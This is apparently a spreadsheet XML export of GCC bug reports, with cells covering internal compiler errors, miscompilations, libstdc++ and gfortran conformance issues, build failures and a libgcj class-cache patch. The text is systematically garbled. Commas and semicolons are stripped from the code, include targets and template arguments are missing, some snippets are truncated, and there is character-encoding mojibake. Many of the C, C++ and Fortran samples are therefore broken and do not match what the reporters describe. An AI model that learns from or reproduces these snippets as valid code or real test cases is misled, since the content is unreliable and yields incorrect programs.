FAIL: gcc.c-torture/execute/20040625-1.c execution  -O3 -fomit-frame-pointer
FAIL: gcc.c-torture/execute/20040625-1.c execution  -O3 -g
FAIL: gcc.c-torture/execute/20040625-1.c compilation  -Os
With the message in the .log being for execution:
*** EXIT code 4242
(ordinary status wrapper abort message)
For compilation:
/usr/tmp/ccC3G03C.o(.text+0x30): In function `maybe_next':
20040625-1.c: undefined reference to `__lshrti3'
collect2: ld returned 1 exit status
(the port doesn't support TImode)</t>
  </si>
  <si>
    <t>GCC-55717</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in form_sum at reload.c:5400</t>
  </si>
  <si>
    <t>Created attachment 28980
preprocessed source
/usr/lib64/gcc/s390x-suse-linux/4.8/cc1plus -fpreprocessed jsinfer.ii -quiet -dumpbase jsinfer.cpp -march=z10 -mtune=z196 -m64 -mzarch -auxbase-strip jsinfer.o -g -g -O2 -Os -O3 -Wpedantic -Wpointer-arith -Woverloaded-virtual -Werror=return-type -Wtype-limits -Wempty-body -Wno-ctor-dtor-privacy -Wno-overlength-strings -Wno-invalid-offsetof -Wno-variadic-macros -Wcast-align -Wno-long-long -Wall -w -version -fvisibility=hidden -fPIC -fmessage-length=0 -fstack-protector -funwind-tables -fasynchronous-unwind-tables -fno-strict-aliasing -fno-rtti -ffunction-sections -fdata-sections -fno-exceptions -freorder-blocks -fomit-frame-pointer -o jsinfer.s
GNU C++ (SUSE Linux) version 4.8.0 20121214 [trunk revision 194496] (s390x-suse-linux)
        compiled by GNU C version 4.8.0 20121214 [trunk revision 194496] GMP version 5.0.5 MPFR version 3.1.1 MPC version 1.0
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C++ (SUSE Linux) version 4.8.0 20121214 [trunk revision 194496] (s390x-suse-linux)
        compiled by GNU C version 4.8.0 20121214 [trunk revision 194496] GMP version 5.0.5 MPFR version 3.1.1 MPC version 1.0
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: a8e31d0d1f1ec059729ba32c442af16c
/home/abuild/rpmbuild/BUILD/mozilla/js/src/jsinfer.cpp: In member function 'void js::types::TypeCompartment::sweep(js::FreeOp*)':
/home/abuild/rpmbuild/BUILD/mozilla/js/src/jsinfer.cpp:6008:1: internal compiler error: in form_sum at reload.c:5400
 }
 ^
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-70245</t>
  </si>
  <si>
    <t>[6 Regression] Miscompilation of ICU on i386 with atom tuning starting with r227382</t>
  </si>
  <si>
    <t>Created attachment 37977
r227382.h
The following testcase distilled from ICU's ucnv_bld.cpp is miscompiled on i?86 starting with r227382 with -m32 -march=i386 -mtune=atom -O2 -fPIC:
g++ -m32 -march=i386 -mtune=atom -O2 -fPIC -o r227382{-1.C-2.C}</t>
  </si>
  <si>
    <t>GCC-79513</t>
  </si>
  <si>
    <t>std::visit doesn't handle references</t>
  </si>
  <si>
    <t>#include 
int main(){
        std::variant v(5)
        std::visit([](int
        std::visit([](int
}
Should be a valid program but libstdc++ discards in both cases the references:
In file included from main.cpp:1:0:
/usr/local/include/c++/7.0.1/variant: In instantiation of 'constexpr decltype(auto) std::visit(_Visitor _Variants = {std::variant}]':
main.cpp:6:38:   required from here
/usr/local/include/c++/7.0.1/variant:1266:44: error: no match for call to '(main()::) (std::variant_alternative_t &gt;&amp;)'
  decltype(std::forward(__visitor)(get(__variants)...))
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~
/usr/local/include/c++/7.0.1/variant:1266:44: note: candidate: void (*)(int&amp;&amp;) 
/usr/local/include/c++/7.0.1/variant:1266:44: note:   conversion of argument 2 would be ill-formed:
/usr/local/include/c++/7.0.1/variant:1266:44: error: cannot bind rvalue reference of type 'int&amp;&amp;' to lvalue of type 'std::variant_alternative_t &gt; {aka int}'
main.cpp:6:21: note: candidate: main():: 
  std::visit([](int
                     ^
main.cpp:6:21: note:   conversion of argument 1 would be ill-formed:
In file included from main.cpp:1:0:
/usr/local/include/c++/7.0.1/variant:1266:44: error: cannot bind rvalue reference of type 'int&amp;&amp;' to lvalue of type 'std::variant_alternative_t &gt; {aka int}'
  decltype(std::forward(__visitor)(get(__variants)...))
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~
/usr/local/include/c++/7.0.1/variant:1266:44: error: no match for call to '(main()::) (std::variant_alternative_t &gt;&amp;)'
/usr/local/include/c++/7.0.1/variant:1266:44: note: candidate: void (*)(int&amp;&amp;) 
/usr/local/include/c++/7.0.1/variant:1266:44: note:   conversion of argument 2 would be ill-formed:
/usr/local/include/c++/7.0.1/variant:1266:44: error: cannot bind rvalue reference of type 'int&amp;&amp;' to lvalue of type 'std::variant_alternative_t &gt; {aka int}'
main.cpp:6:21: note: candidate: main():: 
  std::visit([](int
                     ^
main.cpp:6:21: note:   conversion of argument 1 would be ill-formed:
In file included from main.cpp:1:0:
/usr/local/include/c++/7.0.1/variant:1266:44: error: cannot bind rvalue reference of type 'int&amp;&amp;' to lvalue of type 'std::variant_alternative_t &gt; {aka int}'
  decltype(std::forward(__visitor)(get(__variants)...))
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>GCC-21753</t>
  </si>
  <si>
    <t>String.substring sharing heuristic should be improved</t>
  </si>
  <si>
    <t>The heuristic for sharing String data in String.substring() can result in
significant memory bloat in certain cases. 
Currently it will always share String data unless the resulting substring is &lt;=
8 characters in size. In many applications it seems common for the initial
string to be discarded once a substring has been taken - thus it probably makes
sense to share only when the substring represents a significant proportion of
the original string's size.
See this thread for more information:
http://gcc.gnu.org/ml/java-patches/2005-q2/msg00449.html</t>
  </si>
  <si>
    <t>GCC-40835</t>
  </si>
  <si>
    <t>redundant comparison instruction</t>
  </si>
  <si>
    <t>Compile the following code with options -Os -mthumb -march=armv5te
int bar()
void goo(int int)
void foo()
{
  int v = bar()
  if (v == 0)
    return
  goo(1 v)
}
Gcc generates:
        push    {r3 lr}
        bl      bar
        mov     r1 r0
        cmp     r0 #0    // *
        beq     .L1
        mov     r0 #1
        bl      goo
.L1:
        @ sp needed for prologue
        pop     {r3 pc}
The compare instruction is redundant since the previous move instruction has already set the condition code according to the value of r0.</t>
  </si>
  <si>
    <t>GCC-32737</t>
  </si>
  <si>
    <t>Dear sirs
I would like to apologize if my bug report is done in a poor way: I am a novice in Fortran programming.
I get this segmentation fault error when I compile my code that consists of a main program and three modules.</t>
  </si>
  <si>
    <t>alex_zuma1</t>
  </si>
  <si>
    <t>GCC-50302</t>
  </si>
  <si>
    <t>inefficient float-&gt;double conversion in AVX with -mtune=generic</t>
  </si>
  <si>
    <t>I noticed that with AVX and -mtune=generic and converting a single float to a
double gcc still generates
vunpcklps regreg
vcvtps2pd regreg
instead of the more straight forward and likely more power efficient
vcvtss2sd regreg
AFAIK the first sequence was only needed on some older AMD CPUs with SSE
to avoid a conversion penalty does it really still make sense for AVX?
Perhaps that should be fixed for tune=generic ?
Test case:
#include 
float a = 1 b = 2
float c
int main(void)
{
        c = a + b
        printf(%f\n c)
        return 0
}</t>
  </si>
  <si>
    <t>GCC-37391</t>
  </si>
  <si>
    <t>examples not accessible online (non existing URLs)</t>
  </si>
  <si>
    <t>all the examples referenced by
http://gcc.gnu.org/onlinedocs/libstdc++/ext/pb_ds/assoc_examples.html
are not accessible.</t>
  </si>
  <si>
    <t>GCC-60252</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] [c++11] ICE with invalid variable-length array in lambda parameter</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11) triggers
an ICE since GCC 4.6.0:
====================================
struct A
{
  int i
  void foo()
  {
    [ }
  }
}
====================================
bug.cc: In lambda function:
bug.cc:7:20: internal compiler error: Segmentation fault
     [ }
                    ^
0xba529f crash_signal
        ../../gcc/gcc/toplev.c:337
0x7a3135 tree_check
        ../../gcc/gcc/tree.h:2708
0x7a3135 build_capture_proxy(tree_node*)
        ../../gcc/gcc/cp/lambda.c:360
0x7a3c07 add_capture(tree_node* tree_node* tree_node* bool bool)
        ../../gcc/gcc/cp/lambda.c:553
0x7a43be add_default_capture(tree_node* tree_node* tree_node*)
        ../../gcc/gcc/cp/lambda.c:610
0x7a48b9 lambda_expr_this_capture(tree_node*)
        ../../gcc/gcc/cp/lambda.c:705
0x7a4cc9 maybe_resolve_dummy(tree_node*)
        ../../gcc/gcc/cp/lambda.c:752
0x72a87a finish_non_static_data_member(tree_node* tree_node* tree_node*)
        ../../gcc/gcc/cp/semantics.c:1668
0x72fa77 finish_id_expression(tree_node* tree_node* tree_node* cp_id_kind* bool bool bool* bool bool bool bool char const** unsigned int)
        ../../gcc/gcc/cp/semantics.c:3515
0x6b0b26 cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:4614
0x6b20dd cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5971
0x6b50b6 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7170
0x6b5ddf cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7874
0x6b62d1 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8112
0x6b6795 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8162
0x6b6795 cp_parser_constant_expression
        ../../gcc/gcc/cp/parser.c:8372
0x6bd1bc cp_parser_direct_declarator
        ../../gcc/gcc/cp/parser.c:17217
0x6bd1bc cp_parser_declarator
        ../../gcc/gcc/cp/parser.c:16943
0x6c51c1 cp_parser_parameter_declaration
        ../../gcc/gcc/cp/parser.c:18491
0x6c64e1 cp_parser_parameter_declaration_list
        ../../gcc/gcc/cp/parser.c:18258
Please submit a full bug report [etc.]
With a slightly different testcase I get a different stack-trace:
====================================
struct A
{
  int i
  void foo()
  {
    [ }
  }
}
====================================
bug.cc: In lambda function:
bug.cc:7:23: internal compiler error: in lambda_expr_this_capture at cp/lambda.c:717
     [ }
                       ^
0x7a4ad5 lambda_expr_this_capture(tree_node*)
        ../../gcc/gcc/cp/lambda.c:716
0x7a4cc9 maybe_resolve_dummy(tree_node*)
        ../../gcc/gcc/cp/lambda.c:752
0x72a87a finish_non_static_data_member(tree_node* tree_node* tree_node*)
        ../../gcc/gcc/cp/semantics.c:1668
0x72fa77 finish_id_expression(tree_node* tree_node* tree_node* cp_id_kind* bool bool bool* bool bool bool bool char const** unsigned int)
        ../../gcc/gcc/cp/semantics.c:3515
0x6b0b26 cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:4614
0x6b20dd cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5971
0x6b50b6 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7170
0x6b5ddf cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7874
0x6b62d1 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8112
0x6b6795 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:8162
0x6b6795 cp_parser_constant_expression
        ../../gcc/gcc/cp/parser.c:8372
0x6bd1bc cp_parser_direct_declarator
        ../../gcc/gcc/cp/parser.c:17217
0x6bd1bc cp_parser_declarator
        ../../gcc/gcc/cp/parser.c:16943
0x6c51c1 cp_parser_parameter_declaration
        ../../gcc/gcc/cp/parser.c:18491
0x6c64e1 cp_parser_parameter_declaration_list
        ../../gcc/gcc/cp/parser.c:18258
0x6c6b32 cp_parser_parameter_declaration_clause
        ../../gcc/gcc/cp/parser.c:18179
0x6b100f cp_parser_lambda_declarator_opt
        ../../gcc/gcc/cp/parser.c:9050
0x6b100f cp_parser_lambda_expression
        ../../gcc/gcc/cp/parser.c:8754
0x6b100f cp_parser_primary_expression
        ../../gcc/gcc/cp/parser.c:4305
0x6b20dd cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:5971
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-7934</t>
  </si>
  <si>
    <t>[HP UX] definition of static member for template class missing in obj file</t>
  </si>
  <si>
    <t>The definition of a static data member of a template class seems to be missing in produced obj file. HP's LD will report unresolved symbol for that static member.
nm of the object file find the symbol to be 'U'.
The same version on SunOS seems to work fine as there is a week object defined in object file.
Release:
gcc 3.1.1 (gcc or g++ compiler for C++)
Environment:
hp-ux 11</t>
  </si>
  <si>
    <t>michael_gu</t>
  </si>
  <si>
    <t>GCC-18902</t>
  </si>
  <si>
    <t>Naive (default) complex division algorithm</t>
  </si>
  <si>
    <t>Apparently the default algorithm (the other one available is selectable via
flag_complex_divide_method = 1) is the naive one which is not able to deal
correctly with large denominators. For some additional details see:
  http://gcc.gnu.org/ml/gcc-bugs/2004-12/msg00820.html
I'm attaching a trivial pure C testcase showing at least inconsistency in the
behaviors for real vs complex types. Swithing to flag_complex_divide_method = 1
fixes simple testcases but maybe we really want the full C99-conforming algo
as sketched in Annex G. In that case this would be a (high priority ) request
for enhancement.</t>
  </si>
  <si>
    <t>GCC-39433</t>
  </si>
  <si>
    <t>ICE on header file conflict with -fstack-protector</t>
  </si>
  <si>
    <t>I created a small dummy program with a dedicated insignificant bug.
But gcc throws an error and then core dumps which is abnormal.
Here is the output:
gcc -v -save-temps 1.c &gt;&amp; log.txt
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.1.3 --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2)
 /usr/lib/gcc/i486-linux-gnu/4.1.3/cc1 -E -quiet -v 1.c -mtune=generic -fpch-preprocess -o 1.i
ignoring nonexistent directory /usr/local/include/i486-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/i486-linux-gnu/4.1.3/../../../../i486-linux-gnu/include
ignoring nonexistent directory /usr/include/i486-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc/i486-linux-gnu/4.1.3/include
 /usr/include
End of search list.
 /usr/lib/gcc/i486-linux-gnu/4.1.3/cc1 -fpreprocessed 1.i -quiet -dumpbase 1.c -mtune=generic -auxbase 1 -version -fstack-protector -fstack-protector -o 1.s
GNU C version 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2) (i486-linux-gnu)
        compiled by GNU C version 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2).
GGC heuristics: --param ggc-min-expand=47 --param ggc-min-heapsize=31866
Compiler executable checksum: caf034d6752b947185f431aa3e927159
In file included from 3.h:6
                 from 2.h:6
                 from 1.h:5
                 from 1.c:2:
1.h:3: error: redefinition of typedef â€˜F1â€™
1.h:3: error: previous declaration of â€˜F1â€™ was here
In file included from 3.h:6
                 from 2.h:6
                 from 1.h:5
                 from 1.c:2:
1.h:9: error: field â€˜a2â€™ has incomplete type
In file included from 1.c:2:
1.h:7: error: redefinition of â€˜struct f1â€™
gcc: Internal error: Segmentation fault (program cc1)
Please submit a full bug report.
Since test program is very small I am pasting it here:
source files:
simha@home_pc:~/test/header_file$ cat 1.c
#include 1.h
int main()
{
        F1 a
        a.a = 1
        return 0
}
---------------------------------------------
simha@home_pc:~/test/header_file$ cat 1.h
#ifndef F1_H
typedef struct f1 F1
#include 2.h
struct f1
{
        int a
        F2 a2
}
#define F1_H
#endif
---------------------------------------------
simha@home_pc:~/test/header_file$ cat 2.h
#ifndef F2_H
#define F2_H
typedef struct f2 F2
#include 3.h
struct f2
{
        int a
        F3 a3
}
#endif
---------------------------------------------
simha@home_pc:~/test/header_file$ cat 3.h
#ifndef F3_H
#define F3_H
typedef struct f3 F3
#include 1.h
struct f3
{
        int a
        F1 a1
}
#endif
---------------------------------------------
Finally 1.i:
simha@home_pc:~/test/header_file$ cat 1.i
# 1 1.c
# 1 
# 1 
# 1 1.c
# 1 1.h 1
typedef struct f1 F1
# 1 2.h 1
typedef struct f2 F2
# 1 3.h 1
typedef struct f3 F3
# 1 1.h 1
typedef struct f1 F1
# 1 2.h 1
# 5 1.h 2
struct f1
{
 int a
 F2 a2
}
# 6 3.h 2
struct f3
{
 int a
 F1 a1
}
# 6 2.h 2
struct f2
{
 int a
 F3 a3
}
# 5 1.h 2
struct f1
{
 int a
 F2 a2
}
# 2 1.c 2
int main()
{
 F1 a
 a.a = 1
 return 0
}</t>
  </si>
  <si>
    <t>nmdilipsimha</t>
  </si>
  <si>
    <t>GCC-40591</t>
  </si>
  <si>
    <t>Procedure(interface): Rejected if interface is indirectly hostassociated</t>
  </si>
  <si>
    <t>The following program fails with:
    procedure(sub) pointer :: pptr2
                                    1
Error: Interface 'sub' of procedure 'pptr2' at (1) must be explicit
The question is whether it is valid or not. As both NAG f95 and ifort reject it (g95 accepts it) it might be invalid.
However if one uncomments pptr1: gfortran NAG f95 and g95 accept pptr1 and pptr2 -- while ifort continues to reject pptr2 only. Thus it might be valid at the end.
program main
!  procedure(sub) pointer :: pptr1
!  nullify (pptr1)
contains
  subroutine test()
    procedure(sub) pointer :: pptr2
    nullify (pptr2)
  end subroutine test
  subroutine sub()
  end subroutine sub
end program main</t>
  </si>
  <si>
    <t>GCC-57045</t>
  </si>
  <si>
    <t>Build failure in libgo/runtime/proc.c: error: â€˜({anonymous})â€™ may be used uninitialized in this function</t>
  </si>
  <si>
    <t>Building libgo on Centos 5.9 fails in proc.c due to warning promoted to error:
../../../gcc-svn/trunk/libgo/runtime/proc.c: In function â€˜runtime_entersyscallâ€™:
../../../gcc-svn/trunk/libgo/runtime/proc.c:1414:12: error: â€˜({anonymous})â€™ may be used uninitialized in this function [-Werror=maybe-uninitialized]
  getcontext(
            ^
../../../gcc-svn/trunk/libgo/runtime/proc.c: In function â€˜__go_goâ€™:
../../../gcc-svn/trunk/libgo/runtime/proc.c:1608:13: error: â€˜({anonymous})â€™ may be used uninitialized in this function [-Werror=maybe-uninitialized]
   getcontext(
             ^</t>
  </si>
  <si>
    <t>GCC-25207</t>
  </si>
  <si>
    <t>bootstrap fails on libjava if alsa headers present but no -lasound.</t>
  </si>
  <si>
    <t>This is on FC4 with alsa-lib{.i386x86-64} installed but only
alsa-lib-devel.x86_64 (no alsa-lib-devel.i386). Hence the header
files are there but not the libraries when building the -m32 multilib.
It looks as if configury looks for and finds header files but it's overlooked
to also look for asound libraries:
...
checking for unistd.h... (cached) yes
checking alsa/asoundlib.h usability... yes
checking alsa/asoundlib.h presence... yes
checking for alsa/asoundlib.h... yes
checking dssi.h usability... no
...
/bin/sh ../../../libtool --mode=link /home/hp/combined/native-regobj/./gcc/xgcc -B/home/hp/combined/native-regobj/./gcc/ -B/tmp/r\
eg-native/x86_64-unknown-linux-gnu/bin/ -B/tmp/reg-native/x86_64-unknown-linux-gnu/lib/ -isystem /tmp/reg-native/x86_64-unknown-l\
inux-gnu/include -isystem /tmp/reg-native/x86_64-unknown-linux-gnu/sys-include -L/home/hp/combined/native-regobj/./ld  -m32 -peda\
ntic -W -Wall -Wmissing-declarations -Wwrite-strings -Wmissing-prototypes -Wno-long-long -Wstrict-prototypes  `pkg-config --cflag\
s-only-other alsa` -O2 -g -O2   -m32 -module -version-info 0:0:0 -no-undefined -m32 -o libgjsmalsa.la -rpath /tmp/reg-native/lib/\
classpath  gnu_javax_sound_midi_alsa_AlsaMidiSequencerDevice.lo gnu_javax_sound_midi_alsa_AlsaPortDevice.lo gnu_javax_sound_midi_\
alsa_AlsaMidiDeviceProvider.lo -lasound
/home/hp/combined/native-regobj/./gcc/xgcc -B/home/hp/combined/native-regobj/./gcc/ -B/tmp/reg-native/x86_64-unknown-linux-gnu/bi\
n/ -B/tmp/reg-native/x86_64-unknown-linux-gnu/lib/ -isystem /tmp/reg-native/x86_64-unknown-linux-gnu/include -isystem /tmp/reg-na\
tive/x86_64-unknown-linux-gnu/sys-include -L/home/hp/combined/native-regobj/./ld  -m32 -shared  .libs/gnu_javax_sound_midi_alsa_A\
lsaMidiSequencerDevice.o .libs/gnu_javax_sound_midi_alsa_AlsaPortDevice.o .libs/gnu_javax_sound_midi_alsa_AlsaMidiDeviceProvider.\
o  -L/home/hp/combined/native-regobj/./ld -lasound  -Wl-soname -Wllibgjsmalsa.so.0 -o .libs/libgjsmalsa.so.0.0.0
/home/hp/combined/native-regobj/./gcc/collect-ld: cannot find -lasound
collect2: ld returned 1 exit status
make[11]: *** [libgjsmalsa.la] Error 1
make[11]: Leaving directory `/home/hp/combined/native-regobj/x86_64-unknown-linux-gnu/32/libjava/classpath/native/jni/midi-alsa'
I'll work around this by installing alsa-lib-devel.i386</t>
  </si>
  <si>
    <t>GCC-66284</t>
  </si>
  <si>
    <t>std::reference_wrapper is transparent to std::function::target_type</t>
  </si>
  <si>
    <t>std::function elides reference_wrappers from the target. This is not conforming.
#include 
#include 
struct s { void operator () () {} } g
std::function f = std::ref( g )
int main() {
    assert ( f.target &gt;() )
    assert ( ! f.target() )
}</t>
  </si>
  <si>
    <t>GCC-45519</t>
  </si>
  <si>
    <t>On Linux/x86 revision 163804 gave:
/home/regress/tbox/svn-gcc/libgcc/../gcc/unwind-dw2-fde-glibc.c: In function '_Unwind_IteratePhdrCallback':
/home/regress/tbox/svn-gcc/libgcc/../gcc/unwind-dw2-fde-glibc.c:134:1: error: Invalid first operand of MEM_REF.
D.10501_117
/home/regress/tbox/svn-gcc/libgcc/../gcc/unwind-dw2-fde-glibc.c:134:1: note: in statement
D.11538_238 = 
/home/regress/tbox/svn-gcc/libgcc/../gcc/unwind-dw2-fde-glibc.c:134:1: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [unwind-dw2-fde-glibc.o] Error 1
make[3]: *** Waiting for unfinished jobs....
make[3]: Leaving directory `/home/regress/tbox/native/build/i686-pc-linux-gnu/libgcc'
make[2]: *** [all-stage1-target-libgcc] Error 2
make[2]: Leaving directory `/home/regress/tbox/native/build'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/home/regress/tbox/native/build'
make: *** [bootstrap] Error 2
Revision 163799 is OK. It may be caused by revision 163802:
http://gcc.gnu.org/ml/gcc-cvs/2010-09/msg00093.html</t>
  </si>
  <si>
    <t>GCC-32160</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE with -O3 in verify_ssa</t>
  </si>
  <si>
    <t>I just tried to compile Fortran package LAPACK with the
GNU Fortran compiler version 4.3 snapshot 20070525
The compiler said
/home/dcb/gcc/20070525/results/bin/gfortran -g -O3 -Wall -c clanht.f -o clanht.o
clanht.f: In function 'clanht':
clanht.f:1: error: found a virtual definition for a GIMPLE register
PHI argument
D.1410_62
for PHI node
e__I_lsm0.52_95 = PHI 
clanht.f:1: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Source code attached. Flag -O3 required.</t>
  </si>
  <si>
    <t>GCC-50517</t>
  </si>
  <si>
    <t>gfortran must detect that actual argument type is different from dummy argument type (r178939)</t>
  </si>
  <si>
    <t>! gfortran must detect that actual argument type is different from dummy argument type (r178939)
      module m
       type t
        integer g
       end type
       type u
        integer g
       end type
      end module
      program main
       use m
       interface
        subroutine sub(tfunction)
         use m
! this is a type(t) function
         type(t) external :: tfunction
        end subroutine
       end interface
! this is a type(u) function
       type(u) external :: ufunction
       call sub(ufunction) ! gfortran should emit an error message here
      end program</t>
  </si>
  <si>
    <t>GCC-209</t>
  </si>
  <si>
    <t>egcs-2.91.66 aborts with internal error on template instantiation</t>
  </si>
  <si>
    <t>When compiling the enclosed (preprocessor output) file egcs
produces the following error message. The program might not 
be syntactally correct.
cd /home/lutter/stuff/loop/
make -k 
g++ -v --save-temps -I./   -Wall -ftemplate-depth-25 '-I/home/lutter/packages/CGAL-2.1/include/CGAL/config/i686_Linux-2.2.5-15_g++-egcs-2.91.66' '-I/home/lutter/packages/CGAL-2.1/include' -g   -c test.cpp -o test.o
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
GNU CPP version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 .
 /home/lutter/packages/CGAL-2.1/include/CGAL/config/i686_Linux-2.2.5-15_g++-egcs-2.91.66
 /home/lutter/packages/CGAL-2.1/include
 /usr/include/g++-2
 /usr/local/include
 /usr/i386-redhat-linux/include
 /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/cc1plus test.ii -quiet -dumpbase test.cc -g -Wall -version -ftemplate-depth-25 -o test.s
GNU C++ version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) (i386-redhat-linux) compiled by GNU C version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release).
test.cpp:23: Internal compiler error 980711.
test.cpp:23: Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
test.cpp:23: See  for details.
make: *** [test.o] Error 1
make: *** No rule to make target `test.o' needed by `test'.
make: Target `test' not remade because of errors.
Compilation exited abnormally with code 2 at Sun May 14 22:21:36
Release:
egcs-1.1.2
Environment:
Linux sm0-00 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown</t>
  </si>
  <si>
    <t>lutter</t>
  </si>
  <si>
    <t>GCC-1365</t>
  </si>
  <si>
    <t>deadlock in _Jv_FindClassInCache</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;analyzed
State-Changed-Why: What's happening here is that we have a class living in both a shared library and the main program.
    The AbstractList class is registered when the main program starts up.  This is done through the use of the per-class static constructors.  The same thing happens when the libgcj shared library is loaded.  When the same class is registered twice we end up with a loop in the class cache (klass-&gt;next == klass).
    Here's one way to avoid the deadloop symptom.  It's difficult to say what the right thing to do is. 
    Index: java/lang/natClassLoader.cc
    ===================================================================
    RCS file: /cvs/java/libgcj/libjava/java/lang/natClassLoader.ccv
    retrieving revision 1.25
    diff -u -r1.25 natClassLoader.cc
    --- natClassLoader.cc   2000/07/20 19:31:16     1.25
    +++ natClassLoader.cc   2000/09/10 19:51:49
    @@ -4367 +43618 @@
       for ( *classes ++classes)
         {
           jclass klass = *classes
    -      jint hash = HASH_UTF (klass-&gt;name)
    +      _Jv_Utf8Const *name = klass-&gt;name
    +      jint hash = HASH_UTF (name)
    +      // In certain situations we may find ourselves registering the
    +      // same class twice (but with different implementations).  For
    +      // instance foo.Bar may exist in two different shared
    +      // libraries.  The first class registered wins in this case and
    +      // we proceed silently.
    +      for (jclass k = loaded_classes[hash] k k = k-&gt;next)
    +       {
    +         if (_Jv_equalUtf8Consts (name k-&gt;name))
    +           return
    +       }
           klass-&gt;next = loaded_classes[hash]
           loaded_classes[hash] = klass
</t>
  </si>
  <si>
    <t>GCC-3861</t>
  </si>
  <si>
    <t>K6 optimization broken when compiling libstdc++-v3</t>
  </si>
  <si>
    <t>With K6 optimization (-march=k6 -mcpu=k6) make boostrap fails when compiling libstdc++-v3 but compiles with pentium optimization (-march=i586 -mcpu=i586).
Following command fails with following error:
../../../../gcc/libstdc++-v3/src/ios.cc: In static member function `static void
   std::ios_base::Init::_S_ios_create(bool)':
../../../../gcc/libstdc++-v3/src/ios.cc:173: Unrecognizable insn:
(insn 1652 15 1656 (parallel[
            (set (reg:SI 3 ebx [215])
                (const_int 0 [0x0]))
            (clobber (reg:CC 17 flags))
        ] ) -1 (insn_list:REG_DEP_ANTI 1621 (nil))
    (expr_list:REG_UNUSED (reg:CC 17 flags)
        (nil)))
../../../../gcc/libstdc++-v3/src/ios.cc:173: Internal compiler error in
   insn_default_length at insn-attrtab.c:223
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0.1
Environment:
i586-linux
How-To-Repeat:
CFLAGS=-march=k6 -mcpu=k6 -O2 -mfancy-math-387</t>
  </si>
  <si>
    <t>jlaako</t>
  </si>
  <si>
    <t>GCC-50267</t>
  </si>
  <si>
    <t>[4.4] ICE in lhd_set_decl_assembler_name</t>
  </si>
  <si>
    <t>This one might be related to PR 48207 (although that one has only been fixed for 4.6.1).  It works on 4.5 4.6 and current trunk.
A test case is also committed for this for the later branches so this may be a candidate for a WONTFIX.
ig25@linux-fd1f:~/Krempel/4&gt; cat widechar_compare_1.f90
! { dg-do run }
! PR 50192 - on little-endian systems this used to fail.
program main
  character(kind=4len=2) :: c1 c2
  c1 = 4_' '
  c2 = 4_' '
  c1(1:1) = transfer(257 mold=c1(1:1))
  c2(1:1) = transfer(64 mold=c2(1:1))
  if (c1 &lt; c2) call abort
end program main
ig25@linux-fd1f:~/Krempel/4&gt; gfortran -O widechar_compare_1.f90
widechar_compare_1.f90: In Funktion Â»mainÂ«:
widechar_compare_1.f90:9: interner Compiler-Fehler: in lhd_set_decl_assembler_name bei langhooks.c:167
Bitte senden Sie einen vollstÃ¤ndigen Fehlerbericht auf Englisch ein
bearbeiten Sie die Quellen zunÃ¤chst mit einem PrÃ¤prozessor wenn es
dienlich ist.
Fehler in der deutschen Ãœbersetzung sind an translation-team-de@lists.sourceforge.net zu melden.
Gehen Sie gemÃ¤ÃŸ den Hinweisen in  vor.
ig25@linux-fd1f:~/Krempel/4&gt; gfortran -v
